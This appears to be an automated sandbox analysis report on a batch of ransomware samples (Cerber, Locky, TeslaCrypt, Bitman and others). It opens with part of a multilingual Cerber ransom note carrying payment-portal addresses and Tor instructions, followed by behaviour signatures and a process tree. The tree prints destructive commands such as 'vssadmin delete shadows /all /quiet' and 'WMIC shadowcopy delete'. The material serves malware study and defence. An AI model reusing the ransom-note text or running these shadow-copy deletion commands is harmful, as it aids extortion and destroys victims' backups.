target="_blank">http://xrhwryizf5mui7a5.vx5whc.bid/FCD7-C8A8-CCD1-0446-86C8</a><span class="hr"></span><a href="http://xrhwryizf5mui7a5.9ule2e.bid/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.9ule2e.bid/FCD7-C8A8-CCD1-0446-86C8</a><span class="hr"></span><a href="http://xrhwryizf5mui7a5.onion.to/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.onion.to/FCD7-C8A8-CCD1-0446-86C8</a></span></p><p>If this page cannot be opened &nbsp;<span class="button" onclick="return updateUrl();">click here</span>&nbsp; to generate a new address to your personal page.</p><p>At this page you will receive the complete instructions how to buy the decryption software for restoring all your files.</p><p>Also at this page you will be able to restore any one file for free to be sure "Cerber&nbsp;Decryptor" will help you.</p><hr><p>If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor&nbsp;Browser:</p><ol><li>run your Internet browser (if you do not know what it is run the Internet&nbsp;Explorer);</li><li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li><li>wait for the site loading;</li><li>on the site you will be offered to download Tor&nbsp;Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li><li>run Tor&nbsp;Browser;</li><li>connect with the button "Connect" (if you use the English version);</li><li>a normal Internet browser window will be opened after the initialization;</li><li>type or copy the address <br><span class="info">http://xrhwryizf5mui7a5.onion/FCD7-C8A8-CCD1-0446-86C8</span><br> in this browser address bar;</li><li>press ENTER;</li><li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li></ol><p>If you have any problems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the search bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p><hr><p><strong>Additional information:</strong></p><p>You will find the instructions ("*.hta") for restoring your files in any folder with your encrypted files.</p><p>The instructions ("*.hta") in the folders with your encrypted files are not viruses, the instructions ("*.hta") will help you to decrypt your files.</p><p>Remember the worst situation already happened and now the future of your files depends on your determination and speed of your actions.</p></div><div id="ar" style="direction: rtl;"><p>لا يمكنك العثور على الملفات الضرورية؟<br>هل محتوى الملفات غير قابل للقراءة؟</p><p>هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cerber&nbsp;Ransomware".</p><p>وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا.<br>ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها.</p><p>الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cerber&nbsp;Decryptor".</p><p>إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك!</p><hr><p>يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية:</p><p><span class="info"><span class="updating">أرجو الإنتظار...</span><a class="url" href="http://xrhwryizf5mui7a5.vx5whc.bid/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.vx5whc.bid/FCD7-C8A8-CCD1-0446-86C8</a><span class="hr"></span><a href="http://xrhwryizf5mui7a5.9ule2e.bid/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.9ule2e.bid/FCD7-C8A8-CCD1-0446-86C8</a><span class="hr"></span><a href="http://xrhwryizf5mui7a5.onion.to/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.onion.to/FCD7-C8A8-CCD1-0446-86C8</a></span></p><p>في حالة تعذر فتح هذه الصفحة &nbsp;<span class="button" onclick="return updateUrl();">انقر هنا</span>&nbsp; لإنشاء عنوان جديد لصفحتك الشخصية.</p><p>في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك.</p><p>في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cerber&nbsp;Decryptor" سوف يساعدك.</p><hr><p>إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor:</p><ol><li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li><li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li><li>انتظر لتحميل الموقع;</li><li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li><li>قم بتشغيل متصفح Tor;</li><li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li><li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li><li>قم بكتابة أو نسخ العنوان <br><span class="info">http://xrhwryizf5mui7a5.onion/FCD7-C8A8-CCD1-0446-86C8</span><br> في شريط العنوان في المتصفح;</li><li>اضغط ENTER;</li><li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li></ol><p>إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه.</p><hr><p><strong>معلومات إضافية:</strong></p><p>سوف تجد إرشادات استعادة الملفات الخاصة بك ("*.hta") في أي مجلد مع ملفاتك المشفرة.</p><p>الإرشادات ("*.hta") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*.hta") سوف تساعدك على فك تشفير الملفات الخاصة بك.</p><p>تذكر أن أسوأ موقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك.</p></div><div id="zh"><p>您找不到所需的文件?<br>您文件的内容无法阅读?</p><p>这是正常的,因为您文件的文件名和数据已经被“Cerber&nbsp;Ransomware”加密了。</p><p>这意味着您的文件并没有损坏!您的文件只是被修改了,这个修改是可逆的,解密之前您无法使用您的文件。</p><p>安全解密您文件的唯一方式是购买特别的解密软件“Cerber&nbsp;Decryptor”。</p><p>任何使用第三方软件恢复您文件的方式对您的文件来说都将是致命的!</p><hr><p>您可以在您的个人页面上购买解密软件:</p><p><span class="info"><span class="updating">请稍候...</span><a class="url" href="http://xrhwryizf5mui7a5.vx5whc.bid/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.vx5whc.bid/FCD7-C8A8-CCD1-0446-86C8</a><span class="hr"></span><a href="http://xrhwryizf5mui7a5.9ule2e.bid/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.9ule2e.bid/FCD7-C8A8-CCD1-0446-86C8</a><span class="hr"></span><a href="http://xrhwryizf5mui7a5.onion.to/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.onion.to/FCD7-C8A8-CCD1-0446-86C8</a></span></p><p>如果这个页面无法打开,请 <span class="button" onclick="return updateUrl();">点击这里</span> 生成您个人页面的新地址。</p><p>您将在这个页面上看到如何购买解密软件以恢复您的文件。</p><p>您可以在这个页面使用“Cerber&nbsp;Decryptor”免费恢复任何文件。</p><hr><p>如果您的个人页面长期不可用,有其他方法可以打开您的个人页面 - 安装并使用 Tor 浏览器:</p><ol><li>使用您的上网浏览器(如果您不知道使用 Internet&nbsp;Explorer 的话);</li><li>在浏览器的地址栏输入或复制地址 <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> 并按 ENTER 键;</li><li>等待站点加载;</li><li>您将在站点上下载 Tor 浏览器;下载并运行它,按照安装指南进行操作,等待直至安装完成;</li><li>运行 Tor 浏览器;</li><li>使用“Connect”按钮进行连接(如果您使用英文版);</li><li>初始化之后将打开正常的上网浏览器窗口;</li><li>在浏览器地址栏中输入或复制地址 <br><span class="info">http://xrhwryizf5mui7a5.onion/FCD7-C8A8-CCD1-0446-86C8</span><br></li><li>按 ENTER 键;</li><li>该站点将加载;如果由于某些原因等待一会儿后没有加载,请重试。</li></ol><p>如果在安装期间或使用 Tor 浏览器期间有任何问题,请访问 <a href="https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8" target="_blank">https://www.baidu.com</a> 并在搜索栏中输入“怎么安装 Tor 浏览器”,您将找到有关如何安装洋葱 Tor 浏览器的说明和教程。</p><hr><p><strong>附加信息:</strong></p><p>您将在任何带有加密文件的文件夹中找到恢复您文件(“*.hta”)的说明。</p><p>带有加密文件的文件夹中的(“*.hta”)说明不是病毒,(“*.hta”)说明将帮助您解密您的文件。</p><p>请记住,最坏的情况都发生过了,您的文件还能不能用取决于您的决定和反应速度。</p></div><div id="nl"><p>Kunt u de nodige files niet vinden?<br>Is de inhoud van uw bestanden niet leesbaar?</p><p>Het is gewoonlijk omdat de bestandsnamen en de gegevens in uw bestanden zijn versleuteld door “Cerber&nbsp;Ransomware”.</p><p>Het betekent dat uw bestanden NIET beschadigd zijn! Uw bestanden zijn alleen gewijzigd. Deze wijziging is omkeerbaar. Vanaf nu is het niet mogelijk uw bestanden te gebruiken totdat ze ontsleuteld zijn.</p><p>De enige manier om uw bestanden veilig te ontsleutelen is door de speciale ontsleutel-software “Cerber&nbsp;Decryptor” te kopen.</p><p>Elke poging om uw bestanden te herstellen met software van een derde partij zal fataal zijn voor uw bestanden!</p><hr><p>U kunt op uw persoonlijke pagina de ontsleutel-software kopen:</p><p><span class="info"><span class="updating">Even geduld aub...</span><a class="url" href="http://xrhwryizf5mui7a5.vx5whc.bid/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.vx5whc.bid/FCD7-C8A8-CCD1-0446-86C8</a><span class="hr"></span><a href="http://xrhwryizf5mui7a5.9ule2e.bid/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.9ule2e.bid/FCD7-C8A8-CCD1-0446-86C8</a><span class="hr"></span><a href="http://xrhwryizf5mui7a5.onion.to/FCD7-C8A8-CCD1-0446-86C8" target="_blank">http://xrhwryizf5mui7a5.onion.to/FCD7-C8A8-CCD1-0446-86C8</a></span></p><p>Als deze pagina niet geopend kan worden &nbsp;<span class="button" onclick="return updateUrl();">klik dan hier</span>&nbsp; om een nieuw adres aan uw persoonlijke pagina toe te voegen.</p><p>Op deze pagina zult u de complete instructies ontvangen hoe u de

Signatures

  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

    ransomwarelocky
  • Locky family
    locky
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • TeslaCrypt, AlphaCrypt

    Ransomware based on CryptoLocker. Shut down by the developers in 2016.

    ransomwareteslacrypt
  • Teslacrypt family
    teslacrypt
  • Troldesh family
    troldesh
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

    ransomwaretrojantroldesh
  • Contacts a large (13564) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (2077) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (3673) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (867) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (99) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Looks for VMWare Tools registry key 2 TTPs 4 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 37 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 18 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops desktop.ini file(s) 29 IoCs
  • Enumerates connected drives 3 TTPs 21 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 6 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 19 IoCs
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 17 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Interacts with shadow copies 3 TTPs 10 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 16 IoCs
    evasion
  • Modifies Control Panel 5 IoCs
    evasion
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 4 IoCs
  • NTFS ADS 2 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
    ransomware
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 45 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of UnmapMainImage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 10 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1080
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1088
    • C:\Windows\System32\vssadmin.exe
      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
      2⤵
      • Interacts with shadow copies
      PID:3480
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1156
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00296.7z"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2416
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Foreign.gen-5c361a01962766a606fe33de46ed33062a2672ee34a99ef2a4f52567b7bcab90.exe
        HEUR-Trojan-Ransom.Win32.Foreign.gen-5c361a01962766a606fe33de46ed33062a2672ee34a99ef2a4f52567b7bcab90.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:1976
        • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Foreign.gen-5c361a01962766a606fe33de46ed33062a2672ee34a99ef2a4f52567b7bcab90.exe
          C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Foreign.gen-5c361a01962766a606fe33de46ed33062a2672ee34a99ef2a4f52567b7bcab90.exe
          4⤵
            PID:6064
            • C:\Users\Admin\AppData\Local\Temp\DCSCMIN\fMDCa.exe
              "C:\Users\Admin\AppData\Local\Temp\DCSCMIN\fMDCa.exe"
              5⤵
                PID:1484
                • C:\Users\Admin\AppData\Local\Temp\DCSCMIN\fMDCa.exe
                  C:\Users\Admin\AppData\Local\Temp\DCSCMIN\fMDCa.exe
                  6⤵
                    PID:3128
            • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Gen.vho-32e888b1ee437938a96387d4facb6d07038a620fd0c9e90affda40bdf7c13287.exe
              HEUR-Trojan-Ransom.Win32.Gen.vho-32e888b1ee437938a96387d4facb6d07038a620fd0c9e90affda40bdf7c13287.exe
              3⤵
              • Looks for VirtualBox Guest Additions in registry
              • Checks BIOS information in registry
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious use of AdjustPrivilegeToken
              PID:1980
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c del C:\Users\Admin\Desktop\00296\HEUR-T~2.EXE
                4⤵
                  PID:1424
                • C:\Windows\SysWOW64\cmd.exe
                  /a /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Gen.vho-32e888b1ee437938a96387d4facb6d07038a620fd0c9e90affda40bdf7c13287.exe"
                  4⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  PID:2120
              • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Generic-cd00eecd9d0de87953ed0e905a82c013bb6e954680d80ea1b7fc77b8dbf5a127.exe
                HEUR-Trojan-Ransom.Win32.Generic-cd00eecd9d0de87953ed0e905a82c013bb6e954680d80ea1b7fc77b8dbf5a127.exe
                3⤵
                • Looks for VMWare Tools registry key
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: EnumeratesProcesses
                PID:1972
                • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Generic-cd00eecd9d0de87953ed0e905a82c013bb6e954680d80ea1b7fc77b8dbf5a127.exe
                  HEUR-Trojan-Ransom.Win32.Generic-cd00eecd9d0de87953ed0e905a82c013bb6e954680d80ea1b7fc77b8dbf5a127.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1576
                  • C:\Users\Admin\AppData\Roaming\Niillo\urqe.exe
                    "C:\Users\Admin\AppData\Roaming\Niillo\urqe.exe"
                    5⤵
                    • Looks for VMWare Tools registry key
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    PID:2780
                    • C:\Users\Admin\AppData\Roaming\Niillo\urqe.exe
                      "C:\Users\Admin\AppData\Roaming\Niillo\urqe.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:2608
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_248bdfc4.bat"
                    5⤵
                      PID:2768
                • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Locky.vho-5a7d984ca65795cbebee96dcf409d711c7413077ab82e32da4173aa8eb06764d.exe
                  HEUR-Trojan-Ransom.Win32.Locky.vho-5a7d984ca65795cbebee96dcf409d711c7413077ab82e32da4173aa8eb06764d.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:1120
                • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Zerber.gen-8cc5ac5a1a820e53e8bd7329db1c12f7f8b3d099dd55a1a65a60337f44d8269a.exe
                  HEUR-Trojan-Ransom.Win32.Zerber.gen-8cc5ac5a1a820e53e8bd7329db1c12f7f8b3d099dd55a1a65a60337f44d8269a.exe
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious behavior: MapViewOfSection
                  PID:2096
                  • C:\Users\Admin\Desktop\00296\HEUR-Trojan-Ransom.Win32.Zerber.gen-8cc5ac5a1a820e53e8bd7329db1c12f7f8b3d099dd55a1a65a60337f44d8269a.exe
                    HEUR-Trojan-Ransom.Win32.Zerber.gen-8cc5ac5a1a820e53e8bd7329db1c12f7f8b3d099dd55a1a65a60337f44d8269a.exe
                    4⤵
                      PID:3200
                  • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Agent.ird-c8ca74659486e9b5cb1009ea4bd11197732d48270078c2f54ed16c51f99da1fb.exe
                    Trojan-Ransom.Win32.Agent.ird-c8ca74659486e9b5cb1009ea4bd11197732d48270078c2f54ed16c51f99da1fb.exe
                    3⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:2640
                  • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Agent.ivn-9c05dbc0eda10377207c8858c36e6cd2e92a4e7e89cf8d40ab1bbade148f3c30.exe
                    Trojan-Ransom.Win32.Agent.ivn-9c05dbc0eda10377207c8858c36e6cd2e92a4e7e89cf8d40ab1bbade148f3c30.exe
                    3⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of UnmapMainImage
                    PID:2228
                    • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Agent.ivn-9c05dbc0eda10377207c8858c36e6cd2e92a4e7e89cf8d40ab1bbade148f3c30.exe
                      "C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Agent.ivn-9c05dbc0eda10377207c8858c36e6cd2e92a4e7e89cf8d40ab1bbade148f3c30.exe" g
                      4⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of UnmapMainImage
                      PID:2372
                  • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Agent.jak-42f907e33f53e196e54e1bce5302c112a2b0c68b45e48cd29e04267dc1ada844.exe
                    Trojan-Ransom.Win32.Agent.jak-42f907e33f53e196e54e1bce5302c112a2b0c68b45e48cd29e04267dc1ada844.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:2188
                  • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.aeqv-081c32bb75c7939cd0a2d10aed8410082f92a390c26c91ff402d7757001a7f64.exe
                    Trojan-Ransom.Win32.Bitman.aeqv-081c32bb75c7939cd0a2d10aed8410082f92a390c26c91ff402d7757001a7f64.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:792
                  • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.jyt-c73b835bd76d88523b910108f23564b3a5bc3260e081b7b40c19cdfc71a17f17.exe
                    Trojan-Ransom.Win32.Bitman.jyt-c73b835bd76d88523b910108f23564b3a5bc3260e081b7b40c19cdfc71a17f17.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of SetWindowsHookEx
                    PID:3036
                    • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.jyt-c73b835bd76d88523b910108f23564b3a5bc3260e081b7b40c19cdfc71a17f17.exe
                      Trojan-Ransom.Win32.Bitman.jyt-c73b835bd76d88523b910108f23564b3a5bc3260e081b7b40c19cdfc71a17f17.exe
                      4⤵
                      • Drops file in Windows directory
                      PID:3852
                      • C:\Windows\pviocldfrntx.exe
                        C:\Windows\pviocldfrntx.exe
                        5⤵
                        • Suspicious use of SetWindowsHookEx
                        PID:1636
                        • C:\Windows\pviocldfrntx.exe
                          C:\Windows\pviocldfrntx.exe
                          6⤵
                            PID:4708
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00296\TR6C98~1.EXE
                          5⤵
                            PID:5220
                      • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.kat-83fcdccb40286c12f489ac23df3920da211e8c582a514d9030e1b0b5cb2fd58d.exe
                        Trojan-Ransom.Win32.Bitman.kat-83fcdccb40286c12f489ac23df3920da211e8c582a514d9030e1b0b5cb2fd58d.exe
                        3⤵
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2520
                        • C:\Windows\iccutrjyrrkq.exe
                          C:\Windows\iccutrjyrrkq.exe
                          4⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          • System policy modification
                          PID:2816
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00296\TRF438~1.EXE
                          4⤵
                            PID:2204
                        • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.kfi-1244159f017baade06b7c68116fe833223b800d7c636068dca7eb6a81bab0056.exe
                          Trojan-Ransom.Win32.Bitman.kfi-1244159f017baade06b7c68116fe833223b800d7c636068dca7eb6a81bab0056.exe
                          3⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          • Suspicious use of AdjustPrivilegeToken
                          PID:408
                          • C:\Windows\vlwqiowpbdkr.exe
                            C:\Windows\vlwqiowpbdkr.exe
                            4⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            • System policy modification
                            PID:2320
                            • C:\Windows\System32\wbem\WMIC.exe
                              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
                              5⤵
                                PID:3156
                              • C:\Windows\SysWOW64\NOTEPAD.EXE
                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
                                5⤵
                                • Opens file in notepad (likely ransom note)
                                PID:2084
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
                                5⤵
                                  PID:4796
                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4796 CREDAT:275457 /prefetch:2
                                    6⤵
                                      PID:5540
                                  • C:\Windows\System32\wbem\WMIC.exe
                                    "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive
                                    5⤵
                                      PID:1588
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\VLWQIO~1.EXE
                                      5⤵
                                        PID:3692
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00296\TR7EB4~1.EXE
                                      4⤵
                                        PID:2680
                                    • C:\Users\Admin\Desktop\00296\Trojan-Ransom.Win32.Bitman.kjm-eaff47a7b0aad006c0425053d72435de55890ba4dfdfbffe89006dde012ecd36.exe
                                      Trojan-Ransom.Win32.Bitman.kjm-eaff47a7b0aad006c0425053d72435de55890ba4dfdfbffe89006dde012ecd36.exe
                                      3⤵
                                      • Executes dropped EXE
